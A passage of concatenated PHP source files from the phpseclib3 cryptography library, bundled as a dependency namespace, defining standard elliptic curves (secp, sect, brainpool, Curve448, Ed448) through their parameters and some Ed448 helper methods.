'000000000000000000000000000000000000000000000000000000000000000000000000', '000000000000000000000000000000000000000000000000000000000000000000000000' . '000000000000000000000000000000000000000000000000000000000000000000000001'); $this->setBasePoint('026EB7A859923FBC82189631F8103FE4AC9CA2970012D5D46024804801841CA443709584' . '93B205E647DA304DB4CEB08CBBD1BA39494776FB988B47174DCA88C7E2945283A01C8972', '0349DC807F4FBF374F4AEADE3BCA95314DD58CEC9F307A54FFC61EFC006D8A2C9D4979C0' . 'AC44AEA74FBEBBB9F772AEDCB620B01A7BA7AF1B320430C8591984F601CD4C143EF1C7A3'); $this->setOrder(new \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger('020000000000000000000000000000000000000000000000000000000000000000000000' . '131850E1F19A63E4B391A8DB917F4138B630D84BE5D639381E91DEB45CFE778F637C1001', 16)); } } <?php /** * prime256v1 * * PHP version 5 and 7 * * @author Jim Wigginton <terrafrost@php.net> * @copyright 2017 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://pear.php.net/package/Math_BigInteger */ namespace Google\Site_Kit_Dependencies\phpseclib3\Crypt\EC\Curves; final class prime256v1 extends \Google\Site_Kit_Dependencies\phpseclib3\Crypt\EC\Curves\secp256r1 { } <?php /** * sect409k1 * * PHP version 5 and 7 * * @author Jim Wiggint on <terrafrost@php.net> * @copyright 2017 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://pear.php.net/package/Math_BigInteger */ namespace Google\Site_Kit_Dependencies\phpseclib3\Crypt\EC\Curves; use Google\Site_Kit_Dependencies\phpseclib3\Crypt\EC\BaseCurves\Binary; use Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger; class sect409k1 extends \Google\Site_Kit_Dependencies\phpseclib3\Crypt\EC\BaseCurves\Binary { public function __construct() { $this->setModulo(409, 87, 0); $this->setCoefficients('00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000', '00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001'); $this->setBasePoint('0060F05F658F49C1AD3AB1890F7184210EFD0987E307C84C27ACCFB8F9F67CC2C460189EB5AAAA62EE222EB1B35540CFE9023746', '01E369050B7C4E42ACBA1DACBF04299C3460782F918EA427E6325165E9EA10E3DA5F6C42E9C55215AA9CA27A5863EC48D8E0286B'); $this->setOrder(new \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger('7FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFE5F' . '83B2D4EA20400EC4557D5ED3E3E7CA5B4B5C83B8E01E5FCF', 16)); } } <?php /** * nistp256 * * PHP version 5 and 7 * * @author Jim Wigginton <terrafrost@php.net> * @copyright 2017 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://pear.php.net/package/Math_BigInteger */ namespace Google\Site_Kit_Dependencies\phpseclib3\Crypt\EC\Curves; final class nistp256 extends \Google\Site_Kit_Dependencies\phpseclib3\Crypt\EC\Curves\secp256r1 { } <?php /** * brainpoolP224r1 * * PHP version 5 and 7 * * @author Jim Wigginton <terrafrost@php.net> * @copyright 2017 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://pear.php.net/package/Math_BigInteger */ namespace Google\Site_Kit_Dependencies\phpseclib3\Crypt\EC\Curves; use Google\Site_Kit_Dependencies\phpseclib3\Crypt\EC\BaseCurves\Prime; use Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger; class brainpoolP224r1 extends \Google\Site_Kit_Dependencies\phpseclib3\Crypt\EC\BaseCurves\Prime { public function __construct() { $this->setModulo(new \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger('D7C134AA264366862A18302575D1D787B09F075797DA89F57EC8C0FF', 16)); $this->setCoefficients(new \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger('68A5E62CA9CE6C1C299803A6C1530B514E182AD8B0042A59CAD29F43', 16), new \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger('2580F63CCFE44138870713B1A92369E33E2135D266DBB372386C400B', 16)); $this->setBasePoint(new \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger('0D9029AD2C7E5CF4340823B2A87DC68C9E4CE3174C1E6EFDEE12C07D', 16), new \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger('58AA56F772C0726F24C6B89E4ECDAC24354B9E99CAA3F6D3761402CD', 16)); $this->setOrder(new \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger('D7C134AA264366862A18302575D0FB98D116BC4B6DDEBCA3A5A7939F', 16)); } } <?php /** * brainpoolP512t1 * * PHP version 5 and 7 * * @author Jim Wigginton <terrafrost@php.net> * @copyright 2017 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://pear.php.net/package/Math_BigInteger */ namespace Google\Site_Kit_Dependencies\phpseclib3\Crypt\EC\Curves; use Google\Site_Kit_Dependencies\phpseclib3\Crypt\EC\BaseCurves\Prime; use Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger; class brainpoolP512t1 extends \Google\Site_Kit_Dependencies\phpseclib3\Crypt\EC\BaseCurves\Prime { public function __construct() { $this->setModulo(new \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger('AADD9DB8DBE9C48B3FD4E6AE33C9FC07CB308DB3B3C9D20ED6639CCA703308717D4D9B009BC' . '66842AECDA12AE6A380E62881FF2F2D82C68528AA6056583A48F3', 16)); $this->setCoefficients( new \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger('AADD9DB8DBE9C48B3FD4E6AE33C9FC07CB308DB3B3C9D20ED6639CCA703308717D4D9B009BC' . '66842AECDA12AE6A380E62881FF2F2D82C68528AA6056583A48F0', 16), // eg. -3 new \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger('7CBBBCF9441CFAB76E1890E46884EAE321F70C0BCB4981527897504BEC3E36A62BCDFA23049' . '76540F6450085F2DAE145C22553B465763689180EA2571867423E', 16) ); $this->setBasePoint(new \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger('640ECE5C12788717B9C1BA06CBC2A6FEBA85842458C56DDE9DB1758D39C0313D82BA51735CD' . 'B3EA499AA77A7D6943A64F7A3F25FE26F06B51BAA2696FA9035DA', 16), new \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger('5B534BD595F5AF0FA2C892376C84ACE1BB4E3019B71634C01131159CAE03CEE9D9932184BEE' . 'F216BD71DF2DADF86A627306ECFF96DBB8BACE198B61E00F8B332', 16)); $this->setOrder(new \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger('AADD9DB8DBE9C48B3FD4E6AE33C9FC07CB308DB3B3C9D20ED6639CCA70330870553E5C414CA' . '92619418661197FAC10471DB1D381085DDADDB58796829CA90069', 16)); } } <?php /** * secp112r2 * * PHP version 5 and 7 * * @author Jim Wigginton <terrafrost@php.net> * @copyright 2017 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://pear.php.net/package/Math_BigInteger */ namespace Google\Site_Kit_Dependencies\phpseclib3\Crypt\EC\Curves; use Google\Site_Kit_Dependencies\phpseclib3\Crypt\EC\BaseCurves\Prime; use Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger; class secp112r2 extends \Google\Site_Kit_Dependencies\phpseclib3\Crypt\EC\BaseCurves\Prime { public function __construct() { // same modulo as secp112r1 $this->setModulo(new \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger('DB7C2ABF62E35E668076BEAD208B', 16)); $this->setCoefficients(new \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger('6127C24C05F38A0AAAF65C0EF02C', 16), new \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger('51DEF1815DB5ED74FCC34C85D709', 16)); $this->setBasePoint(new \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger('4BA30AB5E892B4E1649DD0928643', 16), new \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger('ADCD46F5882E3747DEF36E956E97', 16)); $this->setOrder(new \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger('36DF0AAFD8B8D7597CA10520D04B', 16)); } } <?php /** * brainpoolP256r1 * * PHP version 5 and 7 * * @author Jim Wigginton <terrafrost@php.net> * @copyright 2017 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://pear.php.net/package/Math_BigInteger */ namespace Google\Site_Kit_Dependencies\phpseclib3\Crypt\EC\Curves; use Google\Site_Kit_Dependencies\phpseclib3\Crypt\EC\BaseCurves\Prime; use Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger; class brainpoolP256r1 extends \Google\Site_Kit_Dependencies\phpseclib3\Crypt\EC\BaseCurves\Prime { public function __construct() { $this->setModulo(new \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger('A9FB57DBA1EEA9BC3E660A909D838D726E3BF623D52620282013481D1F6E5377', 16)); $this->setCoefficients(new \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger('7D5A0975FC2C3057EEF67530417AFFE7FB8055C126DC5C6CE94A4B44F330B5D9', 16), new \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger('26DC5C6CE94A4B44F330B5D9BBD77CBF958416295CF7E1CE6BCCDC18FF8C07B6', 16)); $this->setBasePoint(new \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger('8BD2AEB9CB7E57CB2C4B482FFC81B7AFB9DE27E1E3BD23C23A4453BD9ACE3262', 16), new \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger('547EF835C3DAC4FD97F8461A14611DC9C27745132DED8E545C1D54C72F046997', 16)); $this->setOrder(new \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger('A9FB57DBA1EEA9BC3E660A909D838D718C397AA3B561A6F7901E0E82974856A7', 16)); } } <?php /** * sect113r1 * * PHP version 5 and 7 * * @author Jim Wigginton <terrafrost@php.net> * @copyright 2017 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://pear.php.net/package/Math_BigInteger */ namespace Google\Site_Kit_Dependencies\phpseclib3\Crypt\EC\Curves; use Google\Site_Kit_Dependencies\phpseclib3\Crypt\EC\BaseCurves\Binary; use Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger; class sect113r1 extends \Google\Site_Kit_Dependencies\phpseclib3\Crypt\EC\BaseCurves\Binary { public function __construct() { $this->setModulo(113, 9, 0); $this->setCoefficients('003088250CA6E7C7FE649CE85820F7', '00E8BEE4D3E2260744188BE0E9C723'); $this->setBasePoint('009D73616F35F4AB1407D73562C10F', '00A52830277958EE84D1315ED31886'); $this->setOrder(new \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger('0100000000000000D9CCEC8A39E56F', 16)); } } <?php /** * brainpoolP224t1 * * PHP version 5 and 7 * * @author Jim Wigginton <terrafrost@php.net> * @copyright 2017 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://pear.php.net/package/Math_BigInteger */ namespace Google\Site_Kit_Dependencies\phpseclib3\Crypt\EC\Curves; use Google\Site_Kit_Dependencies\phpseclib3\Crypt\EC\BaseCurves\Prime; use Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger; class brainpoolP224t1 extends \Google\Site_Kit_Dependencies\phpseclib3\Crypt\EC\BaseCurves\Prime { public function __construct() { $this->setModulo(new \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger('D7C134AA264366862A18302575D1D787B09F075797DA89F57EC8C0FF', 16)); $this->setCoefficients( new \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger('D7C134AA264366862A18302575D1D787B09F075797DA89F57EC8C0FC', 16), // eg. -3 new \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger('4B337D934104CD7BEF271BF60CED1ED20DA14C08B3BB64F18A60888D', 16) ); $this->setBasePoint(new \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger('6AB1E344CE25FF3896424E7FFE14762ECB49F8928AC0C76029B4D580', 16), new \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger('0374E9F5143E568CD23F3F4D7C0D4B1E41C8CC0D1C6ABD5F1A46DB4C', 16)); $this->setOrder(new \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger('D7C134AA264366862A18302575D0FB98D116BC4B6DDEBCA3A5A7939F', 16)); } } <?php /** * secp192k1 * * PHP version 5 and 7 * * @author Jim Wigginton <terrafrost@php.net> * @copyright 2017 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://pear.php.net/package/Math_BigInteger */ namespace Google\Site_Kit_Dependencies\phpseclib3\Crypt\EC\Curves; use Google\Site_Kit_Dependencies\phpseclib3\Crypt\EC\BaseCurves\KoblitzPrime; use Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger; class secp192k1 extends \Google\Site_Kit_Dependencies\phpseclib3\Crypt\EC\BaseCurves\KoblitzPrime { public function __construct() { $this->setModulo(new \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger('FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFEFFFFEE37', 16)); $this->setCoefficients(new \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger('000000000000000000000000000000000000000000000000', 16), new \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger('000000000000000000000000000000000000000000000003', 16)); $this->setBasePoint(new \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger('DB4FF10EC057E9AE26B07D0280B7F4341DA5D1B1EAE06C7D', 16), new \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger('9B2F2F6D9C5628A7844163D015BE86344082AA88D95E2F9D', 16)); $this->setOrder(new \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger('FFFFFFFFFFFFFFFFFFFFFFFE26F2FC170F69466A74DEFD8D', 16)); $this->basis = []; $this->basis[] = ['a' => new \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger('00B3FB3400DEC5C4ADCEB8655C', -16), 'b' => new \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger('8EE96418CCF4CFC7124FDA0F', -16)]; $this->basis[] = ['a' => new \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger('01D90D03E8F096B9948B20F0A9', -16), 'b' => new \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger('42E49819ABBA9474E1083F6B', -16)]; $this->beta = $this->factory->newInteger(new \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger('447A96E6C647963E2F7809FEAAB46947F34B0AA3CA0BBA74', -16)); } } <?php /** * sect283k1 * * PHP version 5 and 7 * * @author Jim Wigginton <terrafrost@php.net> * @copyright 2017 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://pear.php.net/package/Math_BigInteger */ namespace Google\Site_Kit_Dependencies\phpseclib3\Crypt\EC\Curves; final class nistk283 extends \Google\Site_Kit_Dependencies\phpseclib3\Crypt\EC\Curves\sect283k1 { } <?php /** * brainpoolP384t1 * * PHP version 5 and 7 * * @author Jim Wigginton <terrafrost@php.net> * @copyright 2017 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://pear.php.net/package/Math_BigInteger */ namespace Google\Site_Kit_Dependencies\phpseclib3\Crypt\EC\Curves; use Google\Site_Kit_Dependencies\phpseclib3\Crypt\EC\BaseCurves\Prime; use Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger; class brainpoolP384t1 extends \Google\Site_Kit_Dependencies\phpseclib3\Crypt\EC\BaseCurves\Prime { public function __construct() { $this->setModulo(new \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger('8CB91E82A3386D280F5D6F7E50E641DF152F7109ED5456B412B1DA197FB71123ACD3A729901D1A7' . '1874700133107EC53', 16)); $this->setCoefficients( new \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger('8CB91E82A3386D280F5D6F7E50E641DF152F7109ED5456B412B1DA197FB71123ACD3A729901' . 'D1A71874700133107EC50', 16), // eg. -3 new \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger('7F519EADA7BDA81BD826DBA647910F8C4B9346ED8CCDC64E4B1ABD11756DCE1D2074AA263B8' . '8805CED70355A33B471EE', 16) ); $this->setBasePoint(new \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger('18DE98B02DB9A306F2AFCD7235F72A819B80AB12EBD653172476FECD462AABFFC4FF191B946' . 'A5F54D8D0AA2F418808CC', 16), new \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger('25AB056962D30651A114AFD2755AD336747F93475B7A1FCA3B88F2B6A208CCFE469408584DC' . '2B2912675BF5B9E582928', 16)); $this->setOrder(new \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger('8CB91E82A3386D280F5D6F7E50E641DF152F7109ED5456B31F166E6CAC0425A7CF3AB6AF6B7FC31' . '03B883202E9046565', 16)); } } <?php /** * sect113r2 * * PHP version 5 and 7 * * @author Jim Wigginton <terrafrost@php.net> * @copyright 2017 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://pear.php.net/package/Math_BigInteger */ namespace Google\Site_Kit_Dependencies\phpseclib3\Crypt\EC\Curves; use Google\Site_Kit_Dependencies\phpseclib3\Crypt\EC\BaseCurves\Binary; use Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger; class sect113r2 extends \Google\Site_Kit_Dependencies\phpseclib3\Crypt\EC\BaseCurves\Binary { public function __construct() { $this->setModulo(113, 9, 0); $this->setCoefficients('00689918DBEC7E5A0DD6DFC0AA55C7', '0095E9A9EC9B297BD4BF36E059184F'); $this->setBasePoint('01A57A6A7B26CA5EF52FCDB8164797', '00B3ADC94ED1FE674C06E695BABA1D'); $this->setOrder(new \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger('010000000000000108789B2496AF93', 16)); } } <?php /** * sect283k1 * * PHP version 5 and 7 * * @author Jim Wiggint on <terrafrost@php.net> * @copyright 2017 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://pear.php.net/package/Math_BigInteger */ namespace Google\Site_Kit_Dependencies\phpseclib3\Crypt\EC\Curves; use Google\Site_Kit_Dependencies\phpseclib3\Crypt\EC\BaseCurves\Binary; use Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger; class sect283k1 extends \Google\Site_Kit_Dependencies\phpseclib3\Crypt\EC\BaseCurves\Binary { public function __construct() { $this->setModulo(283, 12, 7, 5, 0); $this->setCoefficients('000000000000000000000000000000000000000000000000000000000000000000000000', '000000000000000000000000000000000000000000000000000000000000000000000001'); $this->setBasePoint('0503213F78CA44883F1A3B8162F188E553CD265F23C1567A16876913B0C2AC2458492836', '01CCDA380F1C9E318D90F95D07E5426FE87E45C0E8184698E45962364E34116177DD2259'); $this->setOrder(new \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger('01FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFE9AE2ED07577265DFF7F94451E061E163C61', 16)); } } <?php /** * secp256r1 * * PHP version 5 and 7 * * @author Jim Wigginton <terrafrost@php.net> * @copyright 2017 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://pear.php.net/package/Math_BigInteger */ namespace Google\Site_Kit_Dependencies\phpseclib3\Crypt\EC\Curves; use Google\Site_Kit_Dependencies\phpseclib3\Crypt\EC\BaseCurves\Prime; use Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger; class secp256r1 extends \Google\Site_Kit_Dependencies\phpseclib3\Crypt\EC\BaseCurves\Prime { public function __construct() { $this->setModulo(new \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger('FFFFFFFF00000001000000000000000000000000FFFFFFFFFFFFFFFFFFFFFFFF', 16)); $this->setCoefficients(new \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger('FFFFFFFF00000001000000000000000000000000FFFFFFFFFFFFFFFFFFFFFFFC', 16), new \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger('5AC635D8AA3A93E7B3EBBD55769886BC651D06B0CC53B0F63BCE3C3E27D2604B', 16)); $this->setBasePoint(new \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger('6B17D1F2E12C4247F8BCE6E563A440F277037D812DEB33A0F4A13945D898C296', 16), new \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger('4FE342E2FE1A7F9B8EE7EB4A7C0F9E162BCE33576B315ECECBB6406837BF51F5', 16)); $this->setOrder(new \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger('FFFFFFFF00000000FFFFFFFFFFFFFFFFBCE6FAADA7179E84F3B9CAC2FC632551', 16)); } } <?php /** * sect571r1 * * PHP version 5 and 7 * * @author Jim Wiggint on <terrafrost@php.net> * @copyright 2017 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://pear.php.net/package/Math_BigInteger */ namespace Google\Site_Kit_Dependencies\phpseclib3\Crypt\EC\Curves; use Google\Site_Kit_Dependencies\phpseclib3\Crypt\EC\BaseCurves\Binary; use Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger; class sect571r1 extends \Google\Site_Kit_Dependencies\phpseclib3\Crypt\EC\BaseCurves\Binary { public function __construct() { $this->setModulo(571, 10, 5, 2, 0); $this->setCoefficients('000000000000000000000000000000000000000000000000000000000000000000000000' . '000000000000000000000000000000000000000000000000000000000000000000000001', '02F40E7E2221F295DE297117B7F3D62F5C6A97FFCB8CEFF1CD6BA8CE4A9A18AD84FFABBD' . '8EFA59332BE7AD6756A66E294AFD185A78FF12AA520E4DE739BACA0C7FFEFF7F2955727A'); $this->setBasePoint('0303001D34B856296C16C0D40D3CD7750A93D1D2955FA80AA5F40FC8DB7B2ABDBDE53950' . 'F4C0D293CDD711A35B67FB1499AE60038614F1394ABFA3B4C850D927E1E7769C8EEC2D19', '037BF27342DA639B6DCCFFFEB73D69D78C6C27A6009CBBCA1980F8533921E8A684423E43' . 'BAB08A576291AF8F461BB2A8B3531D2F0485C19B16E2F1516E23DD3C1A4827AF1B8AC15B'); $this->setOrder(new \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger('03FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF' . 'E661CE18FF55987308059B186823851EC7DD9CA1161DE93D5174D66E8382E9BB2FE84E47', 16)); } } <?php /** * Curve448 * * PHP version 5 and 7 * * @author Jim Wigginton <terrafrost@php.net> * @copyright 2019 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://pear.php.net/package/Math_BigInteger */ namespace Google\Site_Kit_Dependencies\phpseclib3\Crypt\EC\Curves; use Google\Site_Kit_Dependencies\phpseclib3\Crypt\EC\BaseCurves\Montgomery; use Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger; class Curve448 extends \Google\Site_Kit_Dependencies\phpseclib3\Crypt\EC\BaseCurves\Montgomery { public function __construct() { // 2^448 - 2^224 - 1 $this->setModulo(new \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger('FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFE' . 'FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF', 16)); $this->a24 = $this->factory->newInteger(new \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger('39081')); $this->p = [$this->factory->newInteger(new \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger(5))]; // 2^446 - 0x8335dc163bb124b65129c96fde933d8d723a70aadc873d6d54a7bb0d $this->setOrder(new \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger('3FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF' . '7CCA23E9C44EDB49AED63690216CC2728DC58F552378C292AB5844F3', 16)); /* $this->setCoefficients( new BigInteger('156326'), // a ); $this->setBasePoint( new BigInteger(5), new BigInteger( '355293926785568175264127502063783334808976399387714271831880898' . '435169088786967410002932673765864550910142774147268105838985595290' . '606362') ); */ } /** * Multiply a point on the curve by a scalar * * Modifies the scalar as described at https://tools.ietf.org/html/rfc7748#page-8 * * @return array */ public function multiplyPoint(array $p, \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger $d) { //$r = strrev(sodium_crypto_scalarmult($d->toBytes(), strrev($p[0]->toBytes()))); //return [$this->factory->newInteger(new BigInteger($r, 256))]; $d = $d->toBytes(); $d[0] = $d[0] & "\xfc"; $d = \strrev($d); $d |= "\x80"; $d = new \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger($d, 256); return parent::multiplyPoint($p, $d); } /** * Creates a random scalar multiplier * * @return BigInteger */ public function createRandomMultiplier() { return \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger::random(446); } /** * Performs range check */ public function rangeCheck(\Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger $x) { if ($x->getLength() > 448 || $x->isNegative()) { throw new \RangeException('x must be a positive integer less than 446 bytes in length'); } } } <?php /** * Ed448 * * PHP version 5 and 7 * * @author Jim Wigginton <terrafrost@php.net> * @copyright 2017 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License */ namespace Google\Site_Kit_Dependencies\phpseclib3\Crypt\EC\Curves; use Google\Site_Kit_Dependencies\phpseclib3\Crypt\EC\BaseCurves\TwistedEdwards; use Google\Site_Kit_Dependencies\phpseclib3\Crypt\Hash; use Google\Site_Kit_Dependencies\phpseclib3\Crypt\Random; use Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger; class Ed448 extends \Google\Site_Kit_Dependencies\phpseclib3\Crypt\EC\BaseCurves\TwistedEdwards { const HASH = 'shake256-912'; const SIZE = 57; public function __construct() { // 2^448 - 2^224 - 1 $this->setModulo(new \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger('FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFE' . 'FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF', 16)); $this->setCoefficients( new \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger(1), // -39081 new \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger('FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFE' . 'FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF6756', 16) ); $this->setBasePoint(new \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger('4F1970C66BED0DED221D15A622BF36DA9E146570470F1767EA6DE324' . 'A3D3A46412AE1AF72AB66511433B80E18B00938E2626A82BC70CC05E', 16), new \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger('693F46716EB6BC248876203756C9C7624BEA73736CA3984087789C1E' . '05A0C2D73AD3FF1CE67C39C4FDBD132C4ED7C8AD9808795BF230FA14', 16)); $this->setOrder(new \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger('3FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF' . '7CCA23E9C44EDB49AED63690216CC2728DC58F552378C292AB5844F3', 16)); } /** * Recover X from Y * * Implements steps 2-4 at https://tools.ietf.org/html/rfc8032#section-5.2.3 * * Used by EC\Keys\Common.php * * @param BigInteger $y * @param boolean $sign * @return object[] */ public function recoverX(\Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger $y, $sign) { $y = $this->factory->newInteger($y); $y2 = $y->multiply($y); $u = $y2->subtract($this->one); $v = $this->d->multiply($y2)->subtract($this->one); $x2 = $u->divide($v); if ($x2->equals($this->zero)) { if ($sign) { throw new \RuntimeException('Unable to recover X coordinate (x2 = 0)'); } return clone $this->zero; } // find the square root $exp = $this->getModulo()->add(new \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger(1)); $exp = $exp->bitwise_rightShift(2); $x = $x2->pow($exp); if (!$x->multiply($x)->subtract($x2)->equals($this->zero)) { throw new \RuntimeException('Unable to recover X coordinate'); } if ($x->isOdd() != $sign) { $x = $x->negate(); } return [$x, $y]; } /** * Extract Secret Scalar * * Implements steps 1-3 at https://tools.ietf.org/html/rfc8032#section-5.2.5 * * Used by the various key handlers * * @param string $str * @return array */ public function extractSecret($str) { if (\strlen($str) != 57) { throw new \LengthException('Private Key should be 57-bytes long'); } // 1. Hash the 57-byte private key using SHAKE256(x, 114), storing the // digest in a 114-octet large buffer, denoted h. Only the lower 57 // bytes are used for generating the public key. $hash = new \Google\Site_Kit_Dependencies\phpseclib3\Crypt\Hash('shake256-912'); $h = $hash->hash($str); $h = \substr($h, 0, 57); // 2. Prune the buffer: The two least significant bits of the first // octet are cleared, all eight bits the last octet are cleared, and // the highest bit of the second to last octet is set. $h[0] = $h[0] & \chr(0xfc); $h = \strrev($h); $h[0] = "\x00"; $h[1] = $h[1] | \chr(0x80); // 3. Interpret the buffer as the little-endian integer, forming a // secret scalar s. $dA = new \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger($h, 256); return ['dA' => $dA, 'secret' => $str]; $dA->secret = $str; return $dA; } /** * Encode a point as a string * * @param array $point * @return string */ public function encodePoint($point) { list($x, $y) = $point; $y = "\x00" . $y->toBytes(); if ($x->isOdd()) { $y[0] = $y[0] | \chr(0x80); } $y = \strrev($y); return $y; } /** * Creates a random scalar multiplier * * @return \phpseclib3\Math\PrimeField\Integer */ public function createRandomMultiplier() { return 